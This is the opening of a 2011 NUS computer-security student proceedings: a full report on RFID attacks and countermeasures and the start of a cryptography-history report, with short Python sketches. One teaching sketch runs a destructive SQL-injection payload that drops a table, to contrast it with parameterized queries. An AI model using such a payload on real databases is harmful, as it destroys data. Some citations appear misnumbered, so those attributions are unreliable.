NATIONAL UNIVERSITY OF SINGAPORE
SCHOOL OF COMPUTING

CS3235 - Semester I, 2011-2012
Computer Security: The Project

Proceedings for CS3235 - Computer Security
November 2011, Singapore

Table of Contents

The Security of RFID and its Implications
    Kang Jun Lee, Jack Aw Yong, Raphael Wun (Gp 1)
Cryptography: From a Historical Perspective
    Wei Xiang Lim, Kok Wei Ooi, Tuan Kiet Vo and Mei Xin Shirlynn Sim (Gp 2)
Elliptic Curve Cryptography
    Guan Xiao Kang, Chong Wei Zhi, Cheong Pui Kun Joan (Gp 3)
Security Requirements in Different Environments
    Ru Ting Liu, Jun Jie Neo, Kar Yaan Kelvin Yip, Junjie Yang (Gp 4)
Integer Factorization
    Romain Edelmann, Jean Gauthier, Fabien Schmitt (Gp 5)
A Study into the Underlying Techniques Deployed in Smart Cards
    Clement Tan, Qi Lin Ho, Soo Ming Poh (Gp 6)
Analysis of Zodiac-340 Cipher
    Yuanyi Zhou, Beibei Tian, Qidan Cai (Gp 8)
The Sampler of Network Attacks
    Guang Yi Ho, Sze Ling Madelene Ng, Nur Bte Adam Ahmad and Siti Najihah Binte Jalaludin (Gp 9)
Report for the Study of Single-Sign-On (SSO): an Introduction and Comparison between Kerberos-based SSO and OpenID SSO
    Xiao Zupao (Gp 10)
An Exploration into the Various Authentication Methods Used to Authenticate Users and Systems
    Gee Seng Richard Heng, Horng Chyi Chan, Huei Rong Foong and Wei Jie Alex Chui (Gp 11)
Different Strategies Used for Securing IEEE 802.11 Systems: the Strengths and the Weaknesses
    Cheng Chang, Yu Gao (Gp 12)
Malicious Software: From Neumann's Theory of Self-Replicating Software to the World's First Cyber Weapon
    Kaarel Nummert (Gp 13)
Password Authentication for Web Applications
    Shi Hua Tan, Wen Jie Ea, Rudyanna Tan (Gp 14)
Data Security for E-transactions: Online Banking and Credit Card Payment Systems
    Jun Lam Ho, Alvin Teh, Kaldybayev Ayan (Gp 15)
A Review of the Techniques Used in Detecting Software Vulnerabilities
    Nicholas Kor, Cheng Du (Gp 17)
Intrusion and Prevention System Analysis
    Tran Dung, Tran Cong Hoang (Gp 18)
An Exploration into What Public Key Infrastructure Is, How It Is Implemented, and How the Greatest Vulnerability of the Public Key Infrastructure Has Nothing to Do with Their Keys
    Laurence Putra Franslay (Gp 19)
The Security of RFID and its Implications

Kang Jun Lee, Jack Aw Yong, Raphael Wun
School of Computing, National University of Singapore

Abstract. The wide usage of RFID tags has greatly increased their market value, which has made the security of RFID tags increasingly important. In this report, we investigate the security and vulnerability of RFID tags, both theoretically and through real-life examples. We also look into the countermeasures and protocols against attacks on RFID tags, present some existing methods for preventing such attacks, and offer brief suggestions of our own on how to improve the security level.

Keywords: RFID, Security, vulnerability of RFID, security of RFID, Radio Frequency Identification

1 Introduction

Radio Frequency Identification, commonly known as RFID, has been around for decades. Its history can be traced all the way back to the Second World War. The Germans, Japanese, Americans and British all used radar during the war to warn of approaching planes while they were still miles away. However, they were unable to differentiate between friendly and hostile planes. The Germans discovered that if pilots rolled their planes as they returned to base, it would change the radio signal reflected back. This indicated to the radar crew on the ground that those were German planes and not allied aircraft (this is, essentially, the first passive RFID system). The British, on the other hand, developed the first active identify friend or foe (IFF) system. They installed a transmitter on each of their planes; when it received signals from radar stations on the ground, it began broadcasting a signal back that identified the aircraft as friendly. RFID works on this same basic concept: a signal is sent to a transponder, which activates the integrated chip and either reflects back a signal (passive system) or broadcasts a signal (active system). [1]

The first RFID patent in the U.S. was granted to Mario W. Cardullo on January 23, 1973, for an active RFID tag with rewritable memory. In the same year, Charles Walton received a patent for a passive transponder used to unlock a door without a key. [1]

Over the years, the technology has evolved and people keep discovering new applications for RFID. It has evolved to the point of replacing the barcode technology that we are familiar with: communication of information takes place without the contact or direct line of sight that barcode technology requires. A simple RFID system is made up of three components: i) an antenna, ii) an RFID reader and iii) an RFID tag. The antenna of the RFID system broadcasts radio signals to activate the RFID tags in order to read and write data to them. The RFID reader broadcasts radio waves whose strength depends on the output power and the radio frequency being used; the read range can be as little as one inch or span as far as 100 feet or more. When the RFID tag is within the reader's broadcast range, the tag is activated and the reader decodes the data encoded in the tag's silicon chip. The decoded data can then be passed to a host computer for processing.

Since the birth of RFID technology, it has become cheaper over the years to implement such a system. As a result we come into contact with it in different areas of our work and life. As this technology becomes more pervasive, just how secure is the data that is being transmitted?
In this research report we explore the different RFID tags on the market and some examples of RFID usage, investigate how secure the RFID systems around us are, and offer suggestions or improvements to enhance the infrastructure.

2 Introduction to RFID and its Security

2.1 Types of RFID Tags

As discussed earlier, RFID tags can be active or passive. Below is a list of active and passive tags that are currently in use.

2.1.1 Active RFID Tags

Such tags have a radio signal transceiver and an onboard battery to power it. The integrated power supply allows the tag to activate itself regardless of whether an RFID reader is in proximity. Because of this integrated power supply, active RFID tags have longer read ranges than passive RFID tags, which have no battery or integrated transceiver. Active RFID tags are commonly used together with Real Time Location Systems (RTLS) because of these characteristics. The embedded battery also allows extra sensors to be powered, e.g. for humidity, temperature or pressure measurement.

2.1.2 Passive RFID Tags

Passive RFID tags do not have an embedded transceiver or battery, and therefore have a shorter read range than active and Battery-Assisted Passive RFID tags. When a passive tag enters a field generated by a reader, it is activated and responds by "reflecting" the reader's modulated signal; this technique is called "backscatter". The reader then receives and decodes the response. Passive RFID tags are low in price and are commonly used for a wide range of applications in the market, but they are rarely used for RTLS because of the way they are activated. Such tags cannot carry extra sensors, as they have no integrated power supply.

2.1.3 Battery-Assisted Passive (BAP) RFID Tags

BAP RFID tags are passive in nature and also use backscatter, but they have an integrated battery that keeps the integrated chip in a stand-by mode. The read ranges of passive RFID tags are often short because power must be channeled to the integrated chip to activate it: the distance between the reader and the passive tag determines whether the minimum energy threshold to activate the integrated chip is reached. The battery in a BAP RFID tag helps to overcome this minimum energy threshold, thereby increasing the read distance. When the battery is depleted, a BAP RFID tag behaves just like a regular passive RFID tag. BAP RFID tags are more expensive than regular passive tags but cheaper than active tags.

2.1.4 Passive RFID Tags with Solar Panel and Ultracapacitor

Such tags function very similarly to BAP RFID tags, but use the combination of a built-in solar panel and an ultracapacitor instead of a battery. In lighted conditions, the solar panel provides energy to the RFID tag, enabling longer read ranges, while at the same time the ultracapacitor is being charged. Under poor light conditions or in total darkness, the tag is therefore able to maintain its read performance for many hours thanks to the energy stored in the ultracapacitor. If it remains in the dark for too long, the energy in the ultracapacitor is depleted and the tag functions like a normal passive RFID tag until it is exposed to light again.

2.1.5 Semi-passive RFID Tags

A semi-passive RFID tag still uses the backscatter technique to communicate with the reader.
It has a battery that is used to power on-board microcontrollers and extra sensors, e.g. a temperature logger. When the battery is depleted, the semi-passive RFID tag stops transmitting any signal.

2.2 Applications of RFID Tags

- Smart Cards
- Passports

The above two applications of RFID tags contain information valuable to individuals as well as corporations. RFID smart cards can be used as security access cards like the NUS matriculation card, transport cards like our EZ-Link cards, and even credit cards. An RFID passport contains information about its holder, who faces identity theft should a hacker be able to obtain that information.

There are of course other usages of RFID tags that do not involve sensitive information. For example, RFID tags are used in libraries, where books are tagged so that they can be located easily and unauthorized checkouts trigger an alarm. RFID tags are also used in marathon races to record runners' start and end timings; such tags are commonly termed "champion tags". RFID tags are also used by corporations to track their shipments and aid in their logistics accounting in the warehouse: workers no longer need to physically count products or scan barcodes to obtain the necessary information.

2.3 Security on RFID

2.3.1 Security of RFID Passports

An RFID passport uses Basic Access Control (BAC) to prevent personal information from being extracted without authorization. BAC uses data such as the passport number, date of birth and expiration date to obtain a session key. This key is then used to encrypt the communication between the passport's integrated chip and a reading device. This mechanism is supposed to ensure that the owner of a passport can decide who can read the electronic contents of the passport. [2]

A passport also uses Extended Access Control (EAC) to protect other sensitive data, such as information for iris recognition and fingerprint recognition. There are two types of EAC to be implemented together with BAC for passports issued in the European Union: EAC Chip Authentication (CA) and EAC Terminal Authentication (TA). [3] The main aim of the CA segment is to check that the chip in the passport is not cloned and to establish a secured communication channel. The TA segment is used to determine whether an Inspection System for the passport is allowed to read the sensitive data stored in it; it uses card-verifiable certificates issued by a document verifier. The lifespan of each certificate ranges from a day to a month. An Inspection System may hold several such certificates, each belonging to a country that allows the system to read the stored data.

2.3.2 Security of Smart Cards

The above table shows the various RFID frequencies together with their capabilities and applications. The EZ-Link cards, as well as a variety of smart cards available in the market, function in the High Frequency range at 13.56 MHz. Some examples of encryption techniques used on such smart cards are Triple DES, the Secure Hash Algorithm (SHA-1) and Crypto-1.

Triple DES applies the Data Encryption Standard (DES) cipher algorithm three times to each data block. Performing the encryption three times effectively increases the key size, protecting against brute-force attacks and therefore increasing its reliability. The SHA-1 hash algorithm has a hash value length of 160 bits. It is claimed to be more secure than the MD5 algorithm and is used in secure protocols like SSH and SSL. Crypto-1 is made up of a 48-bit feedback shift register for the main secret state of the cipher, a linear function, a two-layer 20-to-1 nonlinear function, and a 16-bit LFSR which is used during the authentication phase. However, this cipher is not secure, yet it has been deployed in subway card systems.
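To make the BAC key derivation described in Section 2.3.1 concrete, the following minimal Python sketch derives the 16-byte key seed from the machine-readable zone (MRZ) fields, following our reading of the ICAO 9303 specification; the sample field values are illustrative only.

    import hashlib

    def bac_key_seed(doc_number: str, birth_date: str, expiry_date: str) -> bytes:
        """Derive the 16-byte BAC key seed from MRZ fields (ICAO 9303).

        Each field is followed by its check digit, computed below.
        Dates are YYMMDD strings; the document number is padded with '<'.
        """
        def check_digit(field: str) -> str:
            # ICAO 9303 check digit: repeating weights 7, 3, 1, where
            # '<' counts as 0, digits as themselves, and A-Z as 10-35.
            total = 0
            for i, ch in enumerate(field):
                if ch == '<':
                    val = 0
                elif ch.isdigit():
                    val = int(ch)
                else:
                    val = ord(ch) - ord('A') + 10
                total += val * (7, 3, 1)[i % 3]
            return str(total % 10)

        doc = doc_number.ljust(9, '<')
        mrz_info = (doc + check_digit(doc)
                    + birth_date + check_digit(birth_date)
                    + expiry_date + check_digit(expiry_date))
        # The key seed is the first 16 bytes of the SHA-1 hash of MRZ_info.
        return hashlib.sha1(mrz_info.encode('ascii')).digest()[:16]

    # Sample MRZ values: document number, date of birth, date of expiry.
    seed = bac_key_seed('L898902C3', '690806', '940623')
    print(seed.hex())

The 3DES session keys that encrypt the chip-reader channel are then derived from this seed, so anyone who knows (or guesses) the printed MRZ data can reconstruct the keys; this is why BAC only protects against readers that have not seen the data page.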
3 Vulnerability of RFID Systems

The invention of RFID brings much convenience into our daily life; the cards we use for taking transportation or making payments are great illustrations of its usage. However, RFID and its systems possess a series of vulnerabilities that are susceptible to a broad range of malicious attacks, ranging from pervasive eavesdropping to active interference. The reason RFID is prone to such attacks is its contactless nature: attackers have many possible ways to gain information from cards that use such a mechanism. Hence it is hard to find good methods to counter such attacks.

3.1 Classification of RFID Attacks

Figure 1. Classification of RFID Attacks. Extracted from "Classifying RFID Attacks and Defenses" by Aikaterini Mitrokotsa, Melanie R. Rieback, Andrew S. Tanenbaum [4]

The different types of RFID attacks can be categorized into four different layers: the Physical Layer, the Network-Transport Layer, the Application Layer and the Strategic Layer. Apart from these, there are attacks that target multiple layers. [4] In this research paper, only a handful of attacks relevant to our daily life will be described. Before diving into the details of the attacks associated with each layer, a short description of the layer and its vulnerabilities is given. The mechanism of each attack is described as well, together with a possible scenario showing how close it is to the routine usage of RFID.

3.1.1 Physical Layer

The physical layer in RFID communications comprises the physical interface, the radio signals, and the RFID devices that send and receive information. Because RFID by nature relies on wireless communication, it has poor physical security and lacks resilience against physical manipulation. There are attacks that can either permanently or temporarily disable RFID tags, as well as relay attacks.

3.1.1.1 Permanent Disabling of RFID

RFID tags are extremely sensitive to static electricity: a tag can be damaged instantly by electrostatic discharge caused by high-energy waves, which deactivates passive RFID tags permanently. For active RFID tags, the battery can be discharged through exposure to extremely high or low temperatures.

3.1.1.2 Temporary Disabling of RFID

There are two types of attacks that can temporarily disable RFID tags:

(i) Passive interference: When an RFID network operates in an unstable and noisy environment, it is prone to interference and collisions from any source of radio interference (e.g. electronic generators or power switching supplies). Such interference can prevent accurate and efficient communication between the tag and the reader.

(ii) Active jamming: An adversary can take advantage of RFID's characteristic of listening indiscriminately to all radio signals in its range. In this way, one can create signals within the same range that prevent the tags from communicating efficiently with the readers.
3.1.1.3 Relay Attacks

Here the adversary acts as a man-in-the-middle: an adversarial device is placed between a legitimate RFID tag and a reader. The adversarial device is able to intercept and modify the radio signals as it receives communications from both the legitimate tag and the legitimate reader. Relay attacks can be further categorized into two types:

(i) Mafia fraud: involves an illegitimate party that relays information between two legitimate parties.

(ii) Terrorist fraud: involves the cooperation of a dishonest but legitimate tag, which relays information to an illegitimate third party. However, the dishonest but legitimate tag does not share its secrets with the relaying illegitimate party.

3.1.2 Network-Transport Layer

The attacks on this layer are based on how RFID systems communicate and on the way data is transferred between the entities (reader, tag) of an RFID network.

3.1.2.1 Cloning

This refers to creating a replica of an RFID tag. If an RFID tag has no security features, cloning is as simple as copying the tag's ID and any associated data to the clone tag. However, if the tag has extra security features, the attacker needs to perform a much more sophisticated attack to fool the reader into accepting the clone tag as a legitimate one. Cloned tags cause confusion and violate system integrity.

3.1.2.2 Spoofing

A variant of cloning that does not physically replicate the RFID tag. It employs special devices with increased functionality that are able to emulate RFID tags given some data content. The adversary then impersonates a valid RFID tag to gain the privileges and communication access of the original tag.

3.1.2.3 Reader Attacks

(i) Impersonation: Since RFID communication is most of the time unauthenticated, adversaries may easily counterfeit the identity of real tag readers to elicit sensitive information or modify data. Interestingly, such attacks range from very easy to "practically impossible".

(ii) Eavesdropping: The wireless nature of RFID makes eavesdropping one of the most serious and easily deployable threats. An unauthorized individual can use an antenna to record communications between legitimate tags and readers. The feasibility of this attack depends on factors such as the distance between the attacker and the legitimate RFID devices.

3.1.3 Application Layer

The attacks on this layer are mostly related to applications and the binding between users and RFID tags. Such attacks involve unauthorized tag reading, modification of tag data and attacks on the application middleware.

3.1.3.1 Tag Modification

An adversary can exploit writable tag memory to modify or delete valuable information, depending on the RFID standard in use and the read/write protection it employs. The impact of such attacks depends largely on what the tags are used for, as well as the degree of modification made, especially when tagging objects or humans' critical information. If the reader is fooled into treating the tag as unmodified, the adversary can write falsified information into the tag. This could intensify the aftermath considerably, for example if an RFID tag contains a patient's information and the drugs he is supposed to take.

3.1.3.2 Middleware Attacks

Buffer overflow: An adversary can launch a buffer overflow attack against fixed-length buffers in the back end of the RFID middleware.

Malicious code injection: Using injection techniques such as SQL injection, an adversary can inject malicious code that compromises the back-end RFID system. The attack is based on the unexpected execution of SQL statements, leading to unauthorized access to the back-end database, through which data stored in the back-end RFID middleware can be revealed or modified.
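As a hedged illustration of the injection risk just described, the sketch below contrasts middleware that concatenates tag data directly into an SQL statement with a parameterized query; the table and field names are hypothetical.

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE inventory (tag_id TEXT, location TEXT)")
    conn.execute("INSERT INTO inventory VALUES ('TAG001', 'warehouse A')")

    # Data read from a (malicious) RFID tag: a classic injection payload.
    tag_data = "x'; DROP TABLE inventory; --"

    # Safe: a parameterized query treats the tag data as a plain value,
    # never as SQL, so the payload cannot alter the statement's structure.
    rows = conn.execute(
        "SELECT location FROM inventory WHERE tag_id = ?", (tag_data,)
    ).fetchall()
    print(rows)  # [] -- no tag matches the malicious string, table intact

    # Vulnerable: the tag data is concatenated into the SQL text, so a
    # crafted tag smuggles a second statement into the middleware.
    unsafe = f"SELECT location FROM inventory WHERE tag_id = '{tag_data}'"
    conn.executescript(unsafe)  # silently executes the injected DROP TABLE

    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'"
    ).fetchall()
    print(tables)  # [] -- the inventory table has been dropped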
3.1.4 Strategic Layer

The strategic layer is not visited in this report, as its impact is not very applicable to our field of research.

3.1.5 Multilayer Attacks

3.1.5.1 Denial of Service Attacks

The normal operation of RFID tags may be intentionally interrupted by blocking access to them. Such deliberate blocking of access, and the subsequent DoS, can be caused by the malicious use of "blocker tags". Another form of DoS attack is the unauthorized use of LOCK commands, which are included in several RFID standards to prevent unauthorized writing to RFID tags' memory.

3.1.5.2 Crypto Attacks

Attackers can employ crypto attacks to break the cryptographic algorithms employed and reveal or manipulate sensitive information. By performing, for example, a brute-force attack, one can break the encryption key and obtain information.

3.2 Real World Implications

As we can see from the above, there are various ways for a hacker to crack an RFID system. For example, in 2008 a group of MIT students published a paper revealing how to hack the RFID system of the Boston subway, which uses Crypto-1. [5]

The above-mentioned hack is not restricted to the United States. The Oyster card, the United Kingdom's equivalent of Singapore's EZ-Link card, was hacked in the same year: a group of German scientists managed to crack the Mifare chip within the Oyster card and revealed how possible it is to take a free ride on London transportation. [6] They published their findings on a security exploit of the Mifare DESFire MF3ICD40, which is commonly used as an RFID smart card, using an approach that had previously been used to hack other wireless crypto systems. The attacker must first have physical possession of the smart card, an RFID reader and a radio probe. He then performs a template "side-channel" attack on the card's crypto: using differential power analysis, data is collected from the radio frequency energy that leaks out of the card (the "side channels"). Through this process, the entire 112-bit secret key of the Mifare DESFire MF3ICD40, which uses Triple DES encryption, was retrieved. [6][7]

More examples show that the vulnerability is not restricted to public transport systems. A hacker in the United Kingdom came up with a fast and cheap way to crack the RFID encryption on an American Express card: by spending US$8, one can readily obtain a reader and software available on eBay to obtain information from the card, and then proceed with the cracking procedure. [8]

The same applies to electronic passports. Despite all the security measures that most electronic passports claim to have, the information stored in an RFID passport is still not safe: despite the presence of an encrypted session key, it was discovered in recent months that researchers in the Netherlands have found a way to read some stored information remotely. [9]
These examples show that even the relatively strong encryption algorithms used in "touchless" smart cards can be cracked with a small investment of time and the right equipment, exposing the shared crypto key and the data stored on the cards. Many RFID systems around us are thus vulnerable, and more security measures have to be applied to ensure that these systems are safe to use.

4 Countermeasures for Attacks on RFID Systems

RFID attacks are easy to mount and hard to prevent because of the cheap, contact-free nature of the technology. Even though it is possible to implement better encryption algorithms to prevent loss of data confidentiality, doing so in an RFID chip is very costly and not feasible for most RFID systems, since they are restricted to a low price point (such as smart cards for transport systems), which also means limited resources on the chip for implementing such algorithms. [10] Besides, most of the time confidentiality itself does not stop hackers from exploiting the system: simply cloning the RFID chip can let hackers achieve their goal without having to know what is contained inside the chip. It is a big challenge to ensure the security of such systems, and much effort has been put into this issue. Besides the basic encryption and hashing in use, there are other methods to prevent RFID attacks.

4.1 Authentication

Some RFID chips adopt policies to enable reading only by specified devices. Unauthorized devices are not allowed to read from the chip, which prevents sniffing of the chip by unauthorized readers. [11]

4.2 Physical Shielding

Besides improvements to the system itself, security can be improved by the efforts of the end user. One physical method is the Faraday cage (in electromagnetic field theory, a container made of a conductor shields radio waves). [12] The user can keep their RFID cards inside a Faraday cage at all times and take them out only when needed. This prevents the RFID tag from being read except when the user requires it, avoiding unwanted leakage of data from the RFID chips. It is impossible to force every user to cultivate such a habit, which makes this method impractical as a system-wide measure; however, it can be noted as a personal countermeasure for anyone who wishes to keep their RFID materials safe.

4.3 Back-end Monitoring

Since it is practically impossible to ensure perfect security for systems based on cheap RFID chips, we can pursue another option: to 'cure' instead of 'prevent'. The idea is to constantly monitor the RFID back end for any suspicious actions (such as 'possible cloned RFID access'), and to investigate the issue when one is detected. [13]

One example scheme that we can propose is the following. Taking the example of public transport cards (EZ-Link, Oyster cards), the back end can maintain the integrity of a card by storing usage information (time, location, etc.) on the card as well as on the back-end server whenever the card is used. This way, the card stores some of its recent usage records. Since the card has its usage history stored, a cloned card will show a difference from the original card once the cards are used more than once (by different users). This will be reflected in the back-end server: some of the access entries that exist at the server will be missing from each of the cards. Once a mismatch is noticed, the system can detect it and alert the system manager, who decides the actions to be taken next. A sketch of this detection logic follows.
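This sketch assumes hypothetical data structures: each card carries its recent usage records, and the back end flags a possible clone when a presented card is missing entries the server has already logged for that card ID.

    from dataclasses import dataclass, field

    @dataclass
    class Card:
        card_id: str
        history: list = field(default_factory=list)  # records stored on the card

    class BackEnd:
        def __init__(self):
            self.server_log = {}  # card_id -> full list of usage records

        def record_use(self, card: Card, record: str) -> bool:
            """Log a card use; return False if the card looks cloned."""
            log = self.server_log.setdefault(card.card_id, [])
            # A genuine card carries every record the server has logged for
            # it; a clone misses the records produced by the other copy.
            if log and not all(r in card.history for r in log[-3:]):
                print(f"ALERT: possible cloned card {card.card_id}")
                return False
            log.append(record)
            card.history.append(record)
            return True

    backend = BackEnd()
    original = Card("EZ123")
    backend.record_use(original, "08:00 station A")

    clone = Card("EZ123")                         # copied before that trip
    backend.record_use(clone, "09:00 station B")  # missing record -> alert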
This does not actually make the RFID system safer, but it makes the system harder to exploit without being noticed. It enables a quick response after a misuse is detected, without suffering further losses from the consequences of the misuse.

These are extra countermeasures that can be taken to protect RFID systems. They are an add-on to the basic security standards, enabling RFID to achieve a better security level.

5 Conclusion

After looking at various RFID systems and their security standards, we have arrived at the conclusion that RFID systems are vulnerable and need to be improved with newer standards. However, there are big obstacles, such as the low-cost restriction for some systems and the contact-free communication characteristic of the RFID chips. Although many security mechanisms, including encryption, hashing and authentication, are in place, most RFID systems are still vulnerable to various types of attacks, some of which are unavoidable. At this point, self-awareness of the insecurity of RFID-based identification procedures becomes very important, because the system alone is unable to ensure perfect security at the moment. Public awareness of the insecurity of RFID should be raised, as this is currently still the best way to prevent RFID attacks.

References

1. M. Roberti, "The History of RFID Technology", RFID Journal, http://www.rfidjournal.com/article/view/1338/1 (accessed October 29, 2011).
2. L. Hopewell, "RFID, E-Passport Security at Risk: Aus Govt", ZDNet, May 31, 2011, http://www.zdnetasia.com/rfid-e-passport-security-at-risk-aus-govt-62300530.htm
3. D. Kugler, "Extended Access Control: Infrastructure and Protocol", June 1, 2006, http://www.interoptest-berlin.de/pdf/Kuegler__Extended_Access_Control.pdf
4. A. Mitrokotsa, M. R. Rieback, A. S. Tanenbaum, "Classifying RFID Attacks and Defenses", Amsterdam, n.d.
5. R. Ryan, Z. Anderson, A. Chiesa, "Anatomy of a Subway Hack", http://tech.mit.edu/V128/N30/subway/Defcon_Presentation.pdf
6. "Oyster card 'free travel' hack to be released", ITPRO.co.uk, July 22, 2008, http://www.itpro.co.uk/604770/oyster-card-free-travel-hack-to-be-released
7. S. Gallagher, "Researchers hack crypto on RFID smart cards used for keyless entry and transit pass", Ars Technica, Oct 11, 2011, http://arstechnica.com/business/news/2011/10/researchers-hack-crypto-on-rfid-smart-cardsused-for-keyless-entry-and-transit-pass.ars
8. SDN Staff, "Researchers hack popular smartcard used for access control", Security Director News, Oct 18, 2011, http://www.securitydirectornews.com/?p=article&id=sd201110z7V0yY
9. "RFID credit cards easily hacked with $8 reader", Engadget.com, March 19, 2008, http://www.engadget.com/2008/03/19/rfid-credit-cards-easily-hacked-with-8-reader/
10. "Passport RFIDs cloned wholesale by $250 eBay auction spree", theregister.co.uk, February 2, 2009, http://www.theregister.co.uk/2009/02/02/low_cost_rfid_cloner/
11. F. Klaus, "Known attacks on RFID systems, possible countermeasures and upcoming standardisation activities", 2009.
12. W. Qinghua, X. Xiaozhong, T. Wenhao, H. Liang, "Low-cost RFID: security problems and solutions".
13. D. N. Duc, H. R. Lee, Divyan M. Konidala, K. Kim, "Open Issues in RFID Security", Daejeon, 2009.
Cryptography: From a Historical Perspective

Wei Xiang Lim, Kok Wei Ooi, Tuan Kiet Vo, Mei Xin Shirlynn Sim
Computing 1, 13 Computing Drive, Singapore (117417), Republic of Singapore
{u0807150, u0906907, 0807235, u0806996}@nus.edu.sg

Abstract. In this paper, we study a variety of cryptography systems introduced during various time periods, from the classical ancient era to modern times. For each cipher, we address its characteristics, its history, working explanations or examples of how it attains message confidentiality, and its limitations. Besides encryption, some cryptography systems in the modern context also play an important role in authenticating the identity of the sender.

Keywords: cryptography techniques, message confidentiality, security, plaintext messages, cipher-texts, brute-force, cipher, monoalphabetic, polyalphabetic, substitution, block, fractionating, digraph, encrypt, decrypt.

1 Introduction

The history of cryptography can be divided into four major phases, namely the ancient age, the period before World War I, the war years and the modern era. Cryptography refers to the act of concealing the written contents of messages from unintended recipients. In ancient times, cryptography was used largely for private communications, art, religious and military purposes. At the time, cryptography was tantamount to encryption, as the focus was mainly on converting written messages into cipher-texts. This was done to ensure message confidentiality: message contents would be protected against unintended, possibly malicious recipients during delivery from one location to another.

From ancient civilization to the early twentieth century, cryptographers developed and performed considerably uncomplicated algorithms on paper. This happened as early as 1900 B.C., when Egyptians engraved non-standard hieroglyphs in writing on papyrus and wood. In the modern era, as computer communications became prevalent, new cryptography techniques were developed. These techniques are supported by more complex mathematical functions and stronger scientific approaches. As a result, cracking an encryption key using current computational technology and algorithms within a reasonable time frame has become relatively more difficult. For communications and electronic transactions over networks like the Internet, cryptography is deemed a necessity to prevent malicious attacks. Besides ensuring message confidentiality, the goals of modern cryptography also include ensuring message integrity, authentication, and non-repudiation. To attain these goals, three cryptography schemes, namely symmetric cryptography, asymmetric cryptography and hash functions, are used.

1.1 Purpose of Website

The aim of our "CryptograFreaks" website is to provide a learning platform for people who are interested in the workings behind cryptographic systems. Visitors to our website can attempt to encode and decode their own messages with the various cryptographic applets featured. In addition, we also endeavour to reach out to and enhance the learning experiences of visitors who have no prior knowledge of cryptography. You can access our website at the following address: http://www.freedom316.com/cryptografreaks

2 Ancient Cryptography

In this segment, we will be exploring two ancient cryptography techniques and their features, specifically the Atbash cipher and the Caesar cipher.
2.1 Atbash Cipher (http://www.freedom316.com/cryptografreaks/atbash.php)

The Atbash cipher is a monoalphabetic substitution cipher for the Hebrew alphabet. In 500 B.C., the scribes in Israel wrote the book of Jeremiah using the Atbash cipher. The Hebrew language has a few ciphers, and the Atbash cipher is one of them. From 500 B.C. until 1300 A.D., the Atbash cipher was used by the Jews, Gnostics, Cathars and Knights Templar to conceal important names from third parties so as to avoid persecution. At the time, the Knights Templar were not allowed to worship any idols apart from God. However, due to the influence of St Bernard of Clairvaux, they came up with an encryption to represent their admiration for the Greek goddess of wisdom, Sophia: upon encryption, her name was represented by the word "Baphomet". Unfortunately, it soon became known that the Knights Templar had committed idolatry, and many of them were captured and sentenced to death. With the help of the Atbash cipher, other Knights Templar managed to escape the death sentence, as the encrypted names belonging to them could not be identified. It was only in the 20th century that a biblical scholar, Dr Hugh J. Schonfield, applied the cipher to decipher words which he had thought were senseless; as a result, he uncovered mysteries of Judaism's history and of the Knights Templar.

The cipher reverses the alphabet by substituting the first letter of the alphabet with the last, the second letter with the one before the last, and so on. An example in the Latin (Roman) alphabet would be the following: "A" is substituted with "Z", "B" is substituted with "Y" and so on. Table 1 (refer to Appendix A) illustrates the Atbash cipher for the Roman letters from A to J. Since the Atbash cipher is easily reversible, the original letters can easily be decrypted and made known. The Atbash cipher thus lacks complexity and provides minimal security, so encrypted messages cannot maintain their confidentiality.

2.2 Caesar Cipher (http://www.freedom316.com/cryptografreaks/caesar.php)

The Caesar cipher is a monoalphabetic substitution cipher. Because there are only 25 possible shifts for the substitution of each encrypted letter, it is often perceived to be one of the simplest, albeit most renowned, encryption techniques. In 50 B.C., Julius Caesar was the first to utilize the Caesar cipher to ensure message confidentiality in military and government communications among generals and officials.

As seen in Table 2 (refer to Appendix A), each letter in the plaintext is substituted with the letter a fixed number of positions away. For example, with a shift of 3, the letter "A" would be substituted by "D", "B" by "E", and so on. Like the Atbash cipher, the Caesar cipher is easily reversible, and the original letters can be decrypted easily by reversing the cipher. Since the Caesar cipher lacks complexity, it offers negligible communication security and message confidentiality. However, in the ancient era the Caesar cipher was deemed relatively secure, because many of Julius Caesar's unintended recipients were illiterate, and even those who were literate would likely have thought the cipher-texts were written in an unidentified language. Nevertheless, Julius Caesar did attempt to strengthen his encryption technique by substituting Greek letters for Latin letters, so as to enhance communication security and message confidentiality.
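To make the two substitutions concrete, here is a small sketch of both ciphers: Atbash maps the i-th letter to the (25 - i)-th, while the Caesar cipher shifts every letter by a fixed amount (3 in Caesar's own usage).

    import string

    ALPHABET = string.ascii_uppercase

    def atbash(text: str) -> str:
        # A <-> Z, B <-> Y, ...: the alphabet mapped onto its reverse.
        table = str.maketrans(ALPHABET, ALPHABET[::-1])
        return text.upper().translate(table)

    def caesar(text: str, shift: int = 3) -> str:
        # Each letter is replaced by the letter `shift` positions later,
        # wrapping around the end of the alphabet.
        shifted = ALPHABET[shift:] + ALPHABET[:shift]
        return text.upper().translate(str.maketrans(ALPHABET, shifted))

    print(atbash("ATTACK"))       # ZGGZXP
    print(caesar("ATTACK"))       # DWWDFN
    print(caesar("DWWDFN", -3))   # decryption reverses the shift: ATTACK

Both functions are their own inverses up to a parameter change (Atbash exactly, Caesar with the negated shift), which is precisely why these ciphers offer so little security.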
3 Before World War I Cryptography

In this segment, we will be exploring two cryptography techniques and their features, specifically the Vigenère cipher and Jefferson's Wheel cipher.

3.1 Vigenère Cipher (http://www.freedom316.com/cryptografreaks/vigenere.php)

The Vigenère cipher is a polyalphabetic substitution cipher. To encrypt plaintext messages, different Caesar ciphers are applied to the plaintext according to the letters of a specified key: the key denotes which cipher substitution will be used for the encryption of each letter. In 1586, the French cryptographer and diplomat Blaise de Vigenère published his invention of the text autokey cipher, later known as the Vigenère cipher, in his book entitled "Traicté des chiffres ou secrètes manières d'escrires". In the 19th century, the Vigenère cipher was used to encode confidential messages sent across telegraph systems.

